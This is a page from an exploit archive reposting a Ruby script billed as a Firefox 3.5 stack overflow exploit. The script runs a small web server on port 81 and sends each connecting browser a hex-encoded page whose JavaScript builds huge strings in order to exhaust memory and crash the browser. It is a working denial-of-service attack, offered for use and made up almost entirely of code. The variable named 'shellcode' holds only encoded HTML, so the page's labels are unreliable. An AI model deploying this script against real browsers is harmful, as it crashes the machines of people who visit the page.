Firefox 3.5 Stack Overflow Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Firefox 3.5 Stack Overflow Exploit

来源：vfocus.net 作者：Whivack 发布时间：2010-03-31

==================================
Firefox 3.5 Stack Overflow Exploit
==================================

#!bin/ruby

#########################################################
# Exploit : Shellcode Stack Overflow Firefox 3.5
# Date : 23/03/2010
# Author : Whivack Gsk?
# Software Link : http://www.mozilla-europe.org/fr/firefox/3.5/releasenotes/
# Version : 3.5
# Tested On : XP/Vista & Ubuntu
# Fonction : Connect Firefox Browser http://127.0.0.1:81/
##########################################################

require 'socket'

shellcode =
"\x3C\x68\x74\x6D\x6C\x3E" +
"\x3C\x68\x65\x61\x64\x3E" +
"\x3C\x73\x63\x72\x69\x70\x74\x3E" +
"\x76\x61\x72\x20\x73\x20\x3D\x20\x75\x6E\x65\x73\x63\x61\x70\x65\x28\x22\x25\x75\x34\x31\x34\x31\x25\x75\x34\x31\x34\x31\x22\x29\x3B\x20" +
"\x76\x61\x72\x20\x73\x74\x20\x3D\x20\x75\x6E\x65\x73\x63\x61\x70\x65\x28\x22\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x22\x29\x3B\x20" +
"\x76\x61\x72\x20\x66\x32\x20\x3D\x20\x6D\x75\x6C\x38\x28\x73\x74\x2C\x20\x34\x39\x30\x30\x30\x30\x30\x30\x29\x3B\x20" +
"\x76\x61\x72\x20\x66\x20\x3D\x20\x6D\x75\x6C\x38\x28\x73\x2C\x20\x32\x31\x30\x30\x30\x30\x30\x30\x29\x3B\x20" +
"\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\x66\x32\x29\x3B\x20" +
"\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\x66\x29\x3B\x20" +
"\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x6D\x75\x6C\x38\x28\x73\x2C\x20\x6E\x75\x6D\x29\x20\x7B\x20" +
"\x76\x61\x72\x20\x69\x20\x3D\x20\x4D\x61\x74\x68\x2E\x63\x65\x69\x6C\x28\x4D\x61\x74\x68\x2E\x6C\x6F\x67\x28\x6E\x75\x6D\x29\x20\x2F\x20\x4D\x61\x74\x68\x2E\x4C\x4E\x32\x29\x2C\x20" +
"\x72\x65\x73\x20\x3D\x20\x73\x3B" +
"\x64\x6F\x20\x7B" +
"\x72\x65\x73\x20\x2B\x3D\x72\x65\x73\x3B" +
"\x7D\x20\x77\x68\x69\x6C\x65\x20\x28\x30\x20\x3C\x20\x2D\x2D\x69\x29\x3B" +
"\x72\x65\x74\x75\x72\x6E\x20\x72\x65\x73\x2E\x73\x6C\x69\x63\x65\x28\x30\x2C\x20\x73\x2E\x6C\x65\x6E\x67\x74\x68\x20\x2A\x6E\x75\x6D\x29\x3B" +
"\x7D" +
"\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E" +
"\x3C\x2F\x68\x65\x61\x64\x3E" +
"\x3C\x62\x6F\x64\x79\x3E" +
"\x3C\x2F\x62\x6F\x64\x79\x3E" +
"\x3C\x2F\x68\x74\x6D\x6C\x3E" +
"\x3C\x68\x74\x6D\x6C\x3E" +
"\x3C\x62\x6F\x64\x79\x3E" +
"\x3C\x2F\x62\x6F\x64\x79\x3E" +
"\x3C\x2F\x68\x74\x6D\x6C\x3E"

serveur = TCPServer.new( 81 )
client = nil
while ( ( client = serveur.accept ) )
requete = client.gets
client.puts( "HTTP/1.0 200 OK" )
client.puts( "Content-Type:text/html" )
client.puts
client.puts "#{shellcode}"

client.close
end

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告